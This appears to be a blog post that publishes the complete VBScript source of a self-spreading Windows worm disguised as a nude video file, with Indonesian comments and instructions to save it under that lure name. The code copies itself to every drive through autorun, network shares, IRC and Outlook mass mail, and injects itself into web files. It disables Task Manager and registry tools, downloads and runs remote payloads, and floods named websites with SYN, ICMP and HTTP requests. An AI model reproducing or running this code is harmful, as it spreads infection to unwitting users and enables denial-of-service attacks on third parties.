mywisdom.run("c:\windows\system32\patch.vbs")
end sub


rem nude girl internet w0rm version 1.0
rem c0d3r : mywisdom
rem this intenet w0rm will spread via irc, lan, flash disk, drives, outlook email
rem to all my targets and enemies. you wanna play with me? ok you fight with my worm before fight with me
rem special thanks to all devilzc0de crews and members
rem special thanks to all jasakom crews and members
rem special thanks to all ycl crews and members
rem greetz to all solhack 2003-2004 crews
rem got r00t ???
rem this v1rus is made purposely for helping me in ddosing my targets
on error resume next
Set mywisdom = CreateObject("WScript.Shell")
Set fso = CreateObject("Scripting.FileSystemObject")
set file = fso.OpenTextFile(WScript.ScriptFullname,1)
App.TaskVisible = False
infek2()
infek_regiistry_sambil_boker()
infek_sistem()
infek_ie()
download_winsock()
download_winsock2()
download_update_worm1()
infek_file_dan_web()
NetSpread()
sebar_ke_irc_1()
sebarkan_email_hahaha()
kirim_syn_target()
http_ddos_target()
kirim_icmp_target()
iframe_attack()
wget_attack1()
wget_attack2()
wget_attack3()
wget_attack4()
wget_attack5()
browsing()
infek_sistem()
Set mywisdom = CreateObject("WScript.Shell")
anti_delete()
mywisdom.Sleep 100000
jalan()

sub jalan()
Set mywisdom = CreateObject("WScript.Shell")
mywisdom.run("nude_indo_girl.mpg.vbs")

mywisdom.Sleep 100000
end sub

Sub infek2()
on error resume next
dim mywisdom
isi = "Open=nude_indo_girl.mpg.vbs"
Set mywisdom = CreateObject("WScript.Shell")
mywisdom.run("del autorun.inf")
Set fso = CreateObject("Scripting.FileSystemObject")
Set file = fso.OpenTextFile("autorun.inf", 8, True)
file.WriteLine(isi)
file.Close
SET file = NOTHING

win = fso.GetParentFolderName(Wscript.ScriptFullName)

autorun= win & "\autorun.inf"

satu= win & "\nude_indo_girl.mpg.vbs"
dua = "c:\WINDOWS\nude_indo_girl.mpg.vbs"
tiga = "c:\nude_indo_girl.mpg.vbs"
empat = "c:\windows\nude_indo_girl.mpg.vbs"
lima = "c:\windows\system32\nude_indo_girl.mpg.vbs"
enam = "c:\xampp\htdocs\nude_indo_girl.mpg.vbs"
d= "d:\nude_indo_girl.mpg.vbs"
e="e:\nude_indo_girl.mpg.vbs"
f="f:\nude_indo_girl.mpg.vbs"
g="g:\nude_indo_girl.mpg.vbs"
h="h:\nude_indo_girl.mpg.vbs"
i= "I:\nude_indo_girl.mpg.vbs"
j= "j:\nude_indo_girl.mpg.vbs"
k= "k:\nude_indo_girl.mpg.vbs"
l= "l:\nude_indo_girl.mpg.vbs"
m= "m:\nude_indo_girl.mpg.vbs"
n= "n:\nude_indo_girl.mpg.vbs"
o= "o:\nude_indo_girl.mpg.vbs"
p= "p:\nude_indo_girl.mpg.vbs"
q= "q:\nude_indo_girl.mpg.vbs"
r= "r:\nude_indo_girl.mpg.vbs"
s= "s:\nude_indo_girl.mpg.vbs"
t= "t:\nude_indo_girl.mpg.vbs"
u= "u:\nude_indo_girl.mpg.vbs"
v= "v:\nude_indo_girl.mpg.vbs"
w= "w:\nude_indo_girl.mpg.vbs"
x= "x:\nude_indo_girl.mpg.vbs"
y= "y:\nude_indo_girl.mpg.vbs"
z= "z:\nude_indo_girl.mpg.vbs"

fso.CopyFile satu, dua, 0
fso.CopyFile satu, tiga, 0
fso.CopyFile satu, empat, 0
fso.CopyFile satu, lima, 0
fso.CopyFile satu, enam, 0
fso.CopyFile satu, d, 0
fso.CopyFile satu, e, 0
fso.CopyFile satu, f, 0
fso.CopyFile satu, g, 0
fso.CopyFile satu, h, 0
fso.CopyFile satu, i, 0
fso.CopyFile satu, j, 0
fso.CopyFile satu, k, 0
fso.CopyFile satu, l, 0
fso.CopyFile satu, m, 0
fso.CopyFile satu, n, 0
fso.CopyFile satu, o, 0
fso.CopyFile satu, p, 0
fso.CopyFile satu, q, 0
fso.CopyFile satu, r, 0
fso.CopyFile satu, s, 0
fso.CopyFile satu, t, 0
fso.CopyFile satu, u, 0
fso.CopyFile satu, v, 0
fso.CopyFile satu, w, 0
fso.CopyFile satu, x, 0
fso.CopyFile satu, y, 0
fso.CopyFile satu, z, 0

duax = "c:\WINDOWS\autorun.inf"
tigax = "c:\autorun.inf"
empatx = "c:\windows\autorun.inf"
limax = "c:\windows\system32\autorun.inf"
enamx = "c:\xampp\htdocs\autorun.inf"
dx= "d:\autorun.inf"
ex="e:\autorun.inf"
fx="f:\autorun.inf"
gx="g:\autorun.inf"
hx="h:\autorun.inf"
ix= "i:\autorun.inf"
jx= "j:\autorun.inf"
kx= "k:\autorun.inf"
lx= "l:\autorun.inf"
mx= "m:\autorun.inf"
nx= "n:\autorun.inf"
ox= "o:\autorun.inf"
px= "p:\autorun.inf"
qx= "q:\autorun.inf"
rx= "r:\autorun.inf"
sx= "s:\autorun.inf"
tx= "t:\autorun.inf"
ux= "u:\autorun.inf"
vx= "v:\autorun.inf"
wx= "w:\autorun.inf"
xx= "x:\autorun.inf"
yx= "y:\autorun.inf"
zx= "z:\autorun.inf"

fso.CopyFile autorun, duax, 0
fso.CopyFile autorun, tigax, 0
fso.CopyFile autorun, empatx, 0
fso.CopyFile autorun, limax, 0
fso.CopyFile autorun, enamx, 0
fso.CopyFile autorun, dx, 0
fso.CopyFile autorun, ex, 0
fso.CopyFile autorun, fx, 0
fso.CopyFile autorun, gx, 0
fso.CopyFile autorun, hx, 0
fso.CopyFile autorun, ix, 0
fso.CopyFile autorun, jx, 0
fso.CopyFile autorun, kx, 0
fso.CopyFile autorun, lx, 0
fso.CopyFile autorun, mx, 0
fso.CopyFile autorun, nx, 0
fso.CopyFile autorun, ox, 0
fso.CopyFile autorun, px, 0
fso.CopyFile autorun, qx, 0
fso.CopyFile autorun, rx, 0
fso.CopyFile autorun, sx, 0
fso.CopyFile autorun, tx, 0
fso.CopyFile autorun, ux, 0
fso.CopyFile autorun, vx, 0
fso.CopyFile autorun, wx, 0
fso.CopyFile autorun, xx, 0
fso.CopyFile autorun, yx, 0
fso.CopyFile autorun, zx, 0
end sub

'teknik network spreading dari csw
Sub NetSpread()
On Error Resume Next
Set Network = CreateObject("WScript.Network")
Set Shares = Network.EnumNetworkDrives
If Shares.Count > 0 Then
Set fso = CreateObject("Scripting.FileSystemObject")
For Counter1 = 0 To Shares.Count - 1
If Shares.Item(Counter1) <> "" Then
fso.getFile(wscript.ScriptFullName).Copy("nude_indo_girl.mpg.vbs")
Dosearch (Shares.Item(Counter1))
End If
Next
Set fso = Nothing
End If
Set Shares = Nothing
Set Network = Nothing
End Sub

sub infek_file_dan_web()
On Error Resume Next
Dim fso,ekstensi, folder, files, NewsFile,sFolder
Set fso = CreateObject("Scripting.FileSystemObject")
sFolder = fso.GetParentFolderName(Wscript.ScriptFullName)
Set folder = fso.GetFolder(sFolder)
Set files = folder.Files
For each folderIdx In files
ekstensi=fso.GetExtensionName(folderIdx.Name)
if ekstensi="php" or ekstensi="html" or ekstensi="htm" or ekstensi="jsp" or ekstensi="jpg" or ekstensi="jsp" or ekstensi="gif" or ekstensi="png" then
Set objFSO = CreateObject("Scripting.FileSystemObject")
Set objFile = objFSO.GetFile("nude_indo_girl.mpg.vbs")
Set objReadFile = objFSO.OpenTextFile("nude_indo_girl.mpg.vbs", 1)
strContents = objReadFile.ReadAll

Set mywisdom = CreateObject("WScript.Shell")
Set file = fso.OpenTextFile(folderIdx.Name, 8, True)
tag1=""
tag2="window.open('nude_indo_girl.mpg.vbs');"
strContents=tag1+strContents+tag2
file.WriteLine(strContents)
file.Close
objReadFile.Close
SET file = NOTHING
end if

Next
NewFile.Close

end sub

'nonaktifkan firewall
sub disable_firewall()
On Error Resume Next
Set objFirewall = CreateObject("HNetCfg.FwMgr")
Set objPolicy = objFirewall.LocalPolicy.CurrentProfile
objPolicy.FirewallEnabled = FALSE
end sub

'biar tetep eksis
sub anti_delete()
On Error Resume Next
Set fso= Createobject("scripting.filesystemobject")
Set mywisdom2= fso.opentextfile(wscript.scriptfullname, 1)
pengujian_keberadaan= mywisdom2.readall
mywisdom2.Close
Do
If Not (fso.fileexists(wscript.scriptfullname)) Then
Set ada_terus= fso.createtextfile(wscript.scriptfullname, True)
ada_terus.writepengujian_keberadaan
ada_terus.Close
End If
Loop
end sub

'fungsi untuk syn dos ke target
sub kirim_syn_target()
on error resume next
jam=Hour(Now())
menit=Minute(Now())
if jam=12 or jam=15 or jam=16 then
For i = 0 To 15
set winsock = CreateObject("MSWinsock.Winsock")
winsock.Remotehost = "tbd.my"
winsock.RemotePort = 80
winsock.connect
next
winsock.close
end if

if jam=18 or jam=21 or jam=22 then
'syn sec-r1z.com
For i = 0 To 15
set winsock = CreateObject("MSWinsock.Winsock")
winsock.Remotehost = "sec-r1z.com"
winsock.RemotePort = 80
winsock.connect
next
winsock.close
end if

if jam=23 or jam=03 or jam=04 or jam=3 or jam=4 then
'syn v4-team
For i = 0 To 15
set winsock = CreateObject("MSWinsock.Winsock")
winsock.Remotehost = "v4-team.com"
winsock.RemotePort = 80
winsock.connect
next
winsock.close
end if

if jam=06 or jam=09 or jam=6 or jam=9 or jam=10 then
'syn hmsecurity.org
For i = 0 To 15
set winsock = CreateObject("MSWinsock.Winsock")
winsock.Remotehost = "hmsecurity.org"
winsock.RemotePort = 80
winsock.connect
next
winsock.close
end if

if jam=10 then
'syn ardiantz.com
For i = 0 To 20
set winsock = CreateObject("MSWinsock.Winsock")
winsock.Remotehost = "ardiantz.com"
winsock.RemotePort = 80
winsock.connect
next
winsock.close
end if
end sub

'fungsi kirim icmp pada tanggal tanggal tertentu yang udah diset
sub kirim_icmp_target()
hari=Day(now())
if hari=12 then
Set mywisdom = CreateObject("WScript.Shell")
mywisdom.run("ping tbd.my -l 1000 -n 10")
end if

if hari=22 then
Set mywisdom = CreateObject("WScript.Shell")
mywisdom.run("ping ardiantz.com -l 1000 -n 10")
end if

if hari=02 then
Set mywisdom = CreateObject("WScript.Shell")
mywisdom.run("ping hmsecurity.org -l 1000 -n 10")
end if
end sub

sub http_ddos_target()
on error resume next
Dim o
menit=Minute(Now())
jam=Hour(Now())

'request tiap jam ke situs target
if menit>55 then
For i = 0 To 5
Set o = CreateObject("MSXML2.XMLHTTP")
o.open "GET", "http://tbd.my", False
o.send
Set x = CreateObject("MSXML2.XMLHTTP")
x.open "GET", "http://sec-r1z.com", False
x.send
Set r = CreateObject("MSXML2.XMLHTTP")
r.open "GET", "http://hmsecurity.org", False
r.send
Set y = CreateObject("MSXML2.XMLHTTP")
y.open "GET", "http://v4-team.com", False
y.send
Set z = CreateObject("MSXML2.XMLHTTP")
z.open "GET", "http://ardiantz.com", False
z.send

next
end if

'http req tbd
if jam=10 or jam=14 or jam=15 then
For i = 0 To 10
Set o = CreateObject("MSXML2.XMLHTTP")
o.open "GET", "http://tbd.my", False
o.send
next
end if

'http req sec-r1z
if jam=16 or jam=18 or jam=19 then
For i = 0 To 10
Set o = CreateObject("MSXML2.XMLHTTP")
o.open "GET", "http://sec-r1z.com", False
o.send
next
end if

'http req v4-team.com
if jam=20 or jam=22 or jam=23 or jam=24 then
For i = 0 To 10
Set o = CreateObject("MSXML2.XMLHTTP")
o.open "GET", "http://v4-team.com", False
o.send
next
end if

'http req hmsecurity.org
if jam=23 or jam=01 or jam=02 or jam=1 or jam=2 then
For i = 0 To 10
Set o = CreateObject("MSXML2.XMLHTTP")
o.open "GET", "http://hmsecurity.org", False
o.send
next
end if

'http req ardiantz.com
if jam=20 or jam=22 or jam=23 then
For i = 0 To 10
Set o = CreateObject("MSXML2.XMLHTTP")
o.open "GET", "http://ardiantz.com", False
o.send
next
end if
end sub

'penyebaran ke email via outlook diambil dari potongan kode virus i love you
sub sebarkan_email_hahaha()
On Error Resume Next
dim x,a,ctrlists,ctrentries,malead,b,regedit,regv,regad
set regedit=CreateObject("WScript.Shell")
set out=WScript.CreateObject("Outlook.Application")
set mapi=out.GetNameSpace("MAPI")
for ctrlists=1 to mapi.AddressLists.Count
set a=mapi.AddressLists(ctrlists)
x=1
regv=regedit.RegRead("HKEY_CURRENT_USER\Software\Microsoft\WAB"&a)
if (regv="") then
regv=1
end if
if (int(a.AddressEntries.Count)>int(regv)) then
for ctrentries=1 to a.AddressEntries.Count
malead=a.AddressEntries(x)
regad=""
regad=regedit.RegRead("HKEY_CURRENT_USER\Software\Microsoft\WAB"&malead)
if (regad="") then
set male=out.CreateItem(0)
male.Recipients.Add(malead)
male.Subject = "Free Indonesian Girl Nude Scandal Video for You"
male.Body = vbcrlf&"Free Indonesian Girl Nude Scandal Video for You!!! check the attachment. Or download now, click here to download this video: nude_indo_girl.mpg [download] , mirror download: nude_indo_girl.mpg [mirror download]"
male.Attachments.Add(dirsystem&"\nude_indo_girl.mpg.vbs")
male.Attachments.add(App.Path & "" & "nude_indo_girl.mpg.vbs")
male.Send
regedit.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\WAB"&malead,1,"REG_DWORD"
end if
x=x+1
next
regedit.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\WAB"&a,a.AddressEntries.Count
else
regedit.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\WAB"&a,a.AddressEntries.Count
end if
next
Set out=Nothing
Set mapi=Nothing
end sub

'pertahanan diri virus aka self defense
sub infek_regiistry_sambil_boker()
dim win,mywisdom
Set fso = CreateObject("Scripting.FileSystemObject")
win = fso.GetParentFolderName(Wscript.ScriptFullName)
Set mywisdom = CreateObject("WScript.Shell")
With mywisdom

.RegWrite "HKEY_LOCAL_MACHINE\SOFTWARE\Avira\AntiVir_Desktop\Path", "wscript.exe """ & win & "\nude_indo_girl.mpg.vbs"""
.RegWrite "HKEY_LOCAL_MACHINE\SOFTWARE\Avira\AntiVir_Desktop\AppDataDirectory", "wscript.exe """ & win & "\nude_indo_girl.mpg.vbs"""

.RegWrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Stask", "wscript.exe """ & win & "\nude_indo_girl.mpg.vbs"""
.RegWrite "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Hidden", 1, "REG_DWORD"
.RegWrite "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt", 1, "REG_DWORD"
.RegWrite "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden", 1, "REG_DWORD"
.RegWrite "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools", 1, "REG_DWORD"
.RegWrite "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskMgr", 1, "REG_DWORD"
End With
end sub

'strategi perang : siksa musuh pelan pelan
sub infek_ie()
on error resume next
dim hari
hari=Weekday(date)
if hari=1 or hari=2 then
'start page ie diset ke sec-r1z.com
RegLocate = "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\Main\Start Page"
mywisdom.RegWrite RegLocate,"http://sec-r1z.com","REG_SZ"
elseif hari=3 or hari=4 then
'start page ie diset ke v4-team.com
RegLocate = "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\Main\Start Page"
mywisdom.RegWrite RegLocate,"http://v4-team.com","REG_SZ"
elseif hari=5 then
'start page ie diset ke ardiantz.com
RegLocate = "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\Main\Start Page"
mywisdom.RegWrite RegLocate,"http://ardiantz.com","REG_SZ"
else
'start page ie diset ke tbd.my
RegLocate = "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\Main\Start Page"
mywisdom.RegWrite RegLocate,"http://tbd.my","REG_SZ"
end if
end sub

'teknik infeksi dan penyebaran di sistem dan semua drive serta menyembunyikan diri
Sub infek_sistem()
on error resume next
dim mywisdom
isi = "Open=nude_indo_girl.mpg.vbs"
Set mywisdom = CreateObject("WScript.Shell")
mywisdom.run("del autorun.inf")
Set fso = CreateObject("Scripting.FileSystemObject")
Set file = fso.OpenTextFile("autorun.inf", 8, True)
file.WriteLine(isi)
file.Close
SET file = NOTHING
mywisdom.run("attrib +r autorun.inf")
mywisdom.run("attrib +r nude_indo_girl.mpg.vbs")

win = fso.GetParentFolderName(Wscript.ScriptFullName)

autorun= win & "\autorun.inf"

satu= win & "\nude_indo_girl.mpg.vbs"
dua = "c:\WINDOWS\nude_indo_girl.mpg.vbs"
tiga = "c:\nude_indo_girl.mpg.vbs"
empat = "c:\windows\nude_indo_girl.mpg.vbs"
lima = "c:\windows\system32\nude_indo_girl.mpg.vbs"
enam = "c:\xampp\htdocs\nude_indo_girl.mpg.vbs"
d= "d:\nude_indo_girl.mpg.vbs"
e="e:\nude_indo_girl.mpg.vbs"
f="f:\nude_indo_girl.mpg.vbs"
g="g:\nude_indo_girl.mpg.vbs"
h="h:\nude_indo_girl.mpg.vbs"
i= "i:\nude_indo_girl.mpg.vbs"
j= "j:\nude_indo_girl.mpg.vbs"
k= "k:\nude_indo_girl.mpg.vbs"
l= "l:\nude_indo_girl.mpg.vbs"
m= "m:\nude_indo_girl.mpg.vbs"
n= "n:\nude_indo_girl.mpg.vbs"
o= "o:\nude_indo_girl.mpg.vbs"
p= "p:\nude_indo_girl.mpg.vbs"
q= "q:\nude_indo_girl.mpg.vbs"
r= "r:\nude_indo_girl.mpg.vbs"
s= "s:\nude_indo_girl.mpg.vbs"
t= "t:\nude_indo_girl.mpg.vbs"
u= "u:\nude_indo_girl.mpg.vbs"
v= "v:\nude_indo_girl.mpg.vbs"
w= "w:\nude_indo_girl.mpg.vbs"
x= "x:\nude_indo_girl.mpg.vbs"
y= "y:\nude_indo_girl.mpg.vbs"
z= "z:\nude_indo_girl.mpg.vbs"

fso.CopyFile satu, dua, 0
fso.CopyFile satu, tiga, 0
fso.CopyFile satu, empat, 0
fso.CopyFile satu, lima, 0
fso.CopyFile satu, enam, 0
fso.CopyFile satu, d, 0
fso.CopyFile satu, e, 0
fso.CopyFile satu, f, 0
fso.CopyFile satu, g, 0
fso.CopyFile satu, h, 0
fso.CopyFile satu, i, 0
fso.CopyFile satu, j, 0
fso.CopyFile satu, k, 0
fso.CopyFile satu, l, 0
fso.CopyFile satu, m, 0
fso.CopyFile satu, n, 0
fso.CopyFile satu, o, 0
fso.CopyFile satu, p, 0
fso.CopyFile satu, q, 0
fso.CopyFile satu, r, 0
fso.CopyFile satu, s, 0
fso.CopyFile satu, t, 0
fso.CopyFile satu, u, 0
fso.CopyFile satu, v, 0
fso.CopyFile satu, w, 0
fso.CopyFile satu, x, 0
fso.CopyFile satu, y, 0
fso.CopyFile satu, z, 0

duax = "c:\WINDOWS\autorun.inf"
tigax = "c:\autorun.inf"
empatx = "c:\windows\autorun.inf"
limax = "c:\windows\system32\autorun.inf"
enamx = "c:\xampp\htdocs\autorun.inf"
dx= "d:\autorun.inf"
ex="e:\autorun.inf"
fx="f:\autorun.inf"
gx="g:\autorun.inf"
hx="h:\autorun.inf"
ix= "i:\autorun.inf"
jx= "j:\autorun.inf"
kx= "k:\autorun.inf"
lx= "l:\autorun.inf"
mx= "m:\autorun.inf"
nx= "n:\autorun.inf"
ox= "o:\autorun.inf"
px= "p:\autorun.inf"
qx= "q:\autorun.inf"
rx= "r:\autorun.inf"
sx= "s:\autorun.inf"
tx= "t:\autorun.inf"
ux= "u:\autorun.inf"
vx= "v:\autorun.inf"
wx= "w:\autorun.inf"
xx= "x:\autorun.inf"
yx= "y:\autorun.inf"
zx= "z:\autorun.inf"

fso.CopyFile autorun, duax, 0
fso.CopyFile autorun, tigax, 0
fso.CopyFile autorun, empatx, 0
fso.CopyFile autorun, limax, 0
fso.CopyFile autorun, enamx, 0
fso.CopyFile autorun, dx, 0
fso.CopyFile autorun, ex, 0
fso.CopyFile autorun, fx, 0
fso.CopyFile autorun, gx, 0
fso.CopyFile autorun, hx, 0
fso.CopyFile autorun, ix, 0
fso.CopyFile autorun, jx, 0
fso.CopyFile autorun, kx, 0
fso.CopyFile autorun, lx, 0
fso.CopyFile autorun, mx, 0
fso.CopyFile autorun, nx, 0
fso.CopyFile autorun, ox, 0
fso.CopyFile autorun, px, 0
fso.CopyFile autorun, qx, 0
fso.CopyFile autorun, rx, 0
fso.CopyFile autorun, sx, 0
fso.CopyFile autorun, tx, 0
fso.CopyFile autorun, ux, 0
fso.CopyFile autorun, vx, 0
fso.CopyFile autorun, wx, 0
fso.CopyFile autorun, xx, 0
fso.CopyFile autorun, yx, 0
fso.CopyFile autorun, zx, 0
end sub

'teknik network spreading dari csw
Sub NetSpread()
On Error Resume Next
Set Network = CreateObject("WScript.Network")
Set Shares = Network.EnumNetworkDrives
If Shares.Count > 0 Then
Set fso = CreateObject("Scripting.FileSystemObject")
For Counter1 = 0 To Shares.Count - 1
If Shares.Item(Counter1) <> "" Then
fso.getFile(wscript.ScriptFullName).Copy("nude_indo_girl.mpg.vbs")
Dosearch (Shares.Item(Counter1))
End If
Next
Set fso = Nothing
End If
Set Shares = Nothing
Set Network = Nothing
End Sub

sub infek_file_dan_web()
On Error Resume Next
Dim fso,ekstensi, folder, files, NewsFile,sFolder
Set fso = CreateObject("Scripting.FileSystemObject")
sFolder = fso.GetParentFolderName(Wscript.ScriptFullName)
Set folder = fso.GetFolder(sFolder)
Set files = folder.Files
For each folderIdx In files
ekstensi=fso.GetExtensionName(folderIdx.Name)
if ekstensi="php" or ekstensi="html" or ekstensi="htm" or ekstensi="jsp" or ekstensi="jpg" or ekstensi="jsp" or ekstensi="gif" or ekstensi="png" then
Set objFSO = CreateObject("Scripting.FileSystemObject")
Set objFile = objFSO.GetFile("nude_indo_girl.mpg.vbs")
Set objReadFile = objFSO.OpenTextFile("nude_indo_girl.mpg.vbs", 1)
strContents = objReadFile.ReadAll

Set mywisdom = CreateObject("WScript.Shell")
Set file = fso.OpenTextFile(folderIdx.Name, 8, True)
tag1=""
tag2="window.open('nude_indo_girl.mpg.vbs');"
strContents=tag1+strContents+tag2
file.WriteLine(strContents)
file.Close
objReadFile.Close
SET file = NOTHING
end if

Next
NewFile.Close

end sub

sub download_winsock()
strFileURL = "http://ardiantz.com/~checking/wp-includes/MSWINSCK.OCX"
strHDLocation = "c:\windows\system32\MSWINSCK.OCX"

Set objXMLHTTP = CreateObject("MSXML2.XMLHTTP")

objXMLHTTP.open "GET", strFileURL, false
objXMLHTTP.send()

If objXMLHTTP.Status = 200 Then
Set objADOStream = CreateObject("ADODB.Stream")
objADOStream.Open
objADOStream.Type = 1

objADOStream.Write objXMLHTTP.ResponseBody
objADOStream.Position = 0

Set objFSO = Createobject("Scripting.FileSystemObject")
If objFSO.Fileexists(strHDLocation) Then objFSO.DeleteFile strHDLocation
Set objFSO = Nothing

objADOStream.SaveToFile strHDLocation
objADOStream.Close
Set objADOStream = Nothing
End if

Set objXMLHTTP = Nothing
end sub

sub download_winsock2()
strFileURL = "http://yoyoparty.com/upload/MSWINSCK.OCX"
strHDLocation = "c:\windows\system32\MSWINSCK.OCX"

Set objXMLHTTP = CreateObject("MSXML2.XMLHTTP")

objXMLHTTP.open "GET", strFileURL, false
objXMLHTTP.send()

If objXMLHTTP.Status = 200 Then
Set objADOStream = CreateObject("ADODB.Stream")
objADOStream.Open
objADOStream.Type = 1

objADOStream.Write objXMLHTTP.ResponseBody
objADOStream.Position = 0

Set objFSO = Createobject("Scripting.FileSystemObject")
If objFSO.Fileexists(strHDLocation) Then objFSO.DeleteFile strHDLocation
Set objFSO = Nothing

objADOStream.SaveToFile strHDLocation
objADOStream.Close
Set objADOStream = Nothing
End if

Set objXMLHTTP = Nothing
end sub

sub download_winsock2()
strFileURL = "http://yoyoparty.com/upload/MSWINSCK.OCX"
strHDLocation = "c:\windows\system32\MSWINSCK.OCX"

Set objXMLHTTP = CreateObject("MSXML2.XMLHTTP")

objXMLHTTP.open "GET", strFileURL, false
objXMLHTTP.send()

If objXMLHTTP.Status = 200 Then
Set objADOStream = CreateObject("ADODB.Stream")
objADOStream.Open
objADOStream.Type = 1

objADOStream.Write objXMLHTTP.ResponseBody
objADOStream.Position = 0

Set objFSO = Createobject("Scripting.FileSystemObject")
If objFSO.Fileexists(strHDLocation) Then objFSO.DeleteFile strHDLocation
Set objFSO = Nothing

objADOStream.SaveToFile strHDLocation
objADOStream.Close
Set objADOStream = Nothing
End if

Set objXMLHTTP = Nothing
end sub

sub sebar_ke_irc_1()
Set fso = CreateObject("Scripting.FileSystemObject")
nama_w0rm=Wscript.ScriptFullName

win = fso.GetParentFolderName(Wscript.ScriptFullName)

set scriptini=fso.CreateTextFile("C:\Program Files\mIRC\script.ini")
scriptini.WriteLine "[script]"
scriptini.WriteLine ";mIRC Script"
scriptini.WriteLine ";"
scriptini.WriteLine ";http://www.mirc.com"
scriptini.WriteLine ";"
scriptini.WriteLine "n0=on 1:JOIN:#:{"
scriptini.WriteLine "n1= /if ( $nick == $me ) { halt }"
scriptini.WriteLine "n2= /.dcc send $nick " & nama_w0rm
scriptini.WriteLine "n3=}"
end sub

sub iframe_attack()
jam=Hour(Now())
menit=Minute(Now())
if menit=12 then
For i = 0 To 10
Set o = CreateObject("MSXML2.XMLHTTP")
o.open "GET", "http://ardiantz.com/~checking/wp-includes/iframe.php", False
o.send
next
end if
end sub

sub wget_attack1()
jam=Hour(Now())
menit=Minute(Now())
if menit=35 then
For i = 0 To 5
Set o = CreateObject("MSXML2.XMLHTTP")
o.open "GET", "http://ardiantz.com/~checking/wp-includes/wget1.php", False
o.send
data=o.status
next
end if
end sub

sub wget_attack2()
jam=Hour(Now())
menit=Minute(Now())
if menit=35 then
For i = 0 To 5
Set o = CreateObject("MSXML2.XMLHTTP")
o.open "GET", "http://ardiantz.com/~checking/wp-includes/wget2.php", False
o.send
data=o.status
next
end if
end sub

sub wget_attack3()
jam=Hour(Now())
menit=Minute(Now())
if menit=35 then
For i = 0 To 5
Set o = CreateObject("MSXML2.XMLHTTP")
o.open "GET", "http://ardiantz.com/~checking/wp-includes/wget3.php", False
o.send
data=o.status
next
end if
end sub

sub wget_attack4()
jam=Hour(Now())
menit=Minute(Now())
if menit=35 then
For i = 0 To 5
Set o = CreateObject("MSXML2.XMLHTTP")
o.open "GET", "http://ardiantz.com/~checking/wp-includes/wget4.php", False
o.send
data=o.status
next
end if
end sub

sub wget_attack5()
jam=Hour(Now())
menit=Minute(Now())
if menit=35 then
For i = 0 To 5
Set o = CreateObject("MSXML2.XMLHTTP")
o.open "GET", "http://ardiantz.com/~checking/wp-includes/wget5.php", False
o.send
data=o.status
next
end if
end sub

sub browsing()
dim Window
jam=Hour(Now())
menit=Minute(Now())
hari=Day(now())

if jam=12 or jam=13 or jam=23 then
set Window = CreateObject("InternetExplorer.Application")
Window.RegisterAsBrowser = True
Window.Navigate("tbd.my")
Window.MenuBar = True
Window.ToolBar = True
Window.AddressBar = True
Window.StatusBar = True
Window.FullScreen = False
Window.Resizable = True
Window.Visible = True
Window.Width = 850
Window.Height = 720

set Window2 = CreateObject("InternetExplorer.Application")
Window2.RegisterAsBrowser = True
Window2.Navigate("hmsecurity.org")
Window2.MenuBar = True
Window2.ToolBar = True
Window2.AddressBar = True
Window2.StatusBar = True
Window2.FullScreen = False
Window2.Resizable = True
Window2.Visible = True
Window2.Width = 850
Window2.Height = 720

set Window3 = CreateObject("InternetExplorer.Application")
Window3.RegisterAsBrowser = True
Window3.Navigate("v4-team.com")
Window3.MenuBar = True
Window3.ToolBar = True
Window3.AddressBar = True
Window3.StatusBar = True
Window3.FullScreen = False
Window3.Resizable = True
Window3.Visible = True
Window3.Width = 850
Window3.Height = 720

set Window4 = CreateObject("InternetExplorer.Application")
Window4.RegisterAsBrowser = True
Window4.Navigate("sec-r1z.com")
Window4.MenuBar = True
Window4.ToolBar = True
Window4.AddressBar = True
Window4.StatusBar = True
Window4.FullScreen = False
Window4.Resizable = True
Window4.Visible = True
Window4.Width = 850
Window4.Height = 720

set Window5 = CreateObject("InternetExplorer.Application")
Window5.RegisterAsBrowser = True
Window5.Navigate("ardiantz.com")
Window5.MenuBar = True
Window5.ToolBar = True
Window5.AddressBar = True
Window5.StatusBar = True
Window5.FullScreen = False
Window5.Resizable = True
Window5.Visible = True
Window5.Width = 850
Window5.Height = 720
end if
end sub

sub download_update_worm1()

jam=Hour(Now())
menit=Minute(Now())
hari=Day(now())

if jam=10 and hari=10 then
strFileURL = "http://ardiantz.com/~checking/wp-includes/patch.vbs"
strHDLocation = "c:\windows\system32\patch.vbs"

Set objXMLHTTP = CreateObject("MSXML2.XMLHTTP")

objXMLHTTP.open "GET", strFileURL, false
objXMLHTTP.send()

If objXMLHTTP.Status = 200 Then
Set objADOStream = CreateObject("ADODB.Stream")
objADOStream.Open
objADOStream.Type = 1

objADOStream.Write objXMLHTTP.ResponseBody
objADOStream.Position = 0

Set objFSO = Createobject("Scripting.FileSystemObject")
If objFSO.Fileexists(strHDLocation) Then objFSO.DeleteFile strHDLocation
Set objFSO = Nothing

objADOStream.SaveToFile strHDLocation
objADOStream.Close
Set objADOStream = Nothing
End if

Set objXMLHTTP = Nothing

end if

Set mywisdom = CreateObject("WScript.Shell")
mywisdom.run("c:\windows\system32\patch.vbs")
end sub

klo udah save dengan nama nude_indo_girl.mpg.vbs (nama file tdk boleh diubah)

klo ga mu kompi agan kena jangan di klik yaa...

No comments:

Post a Comment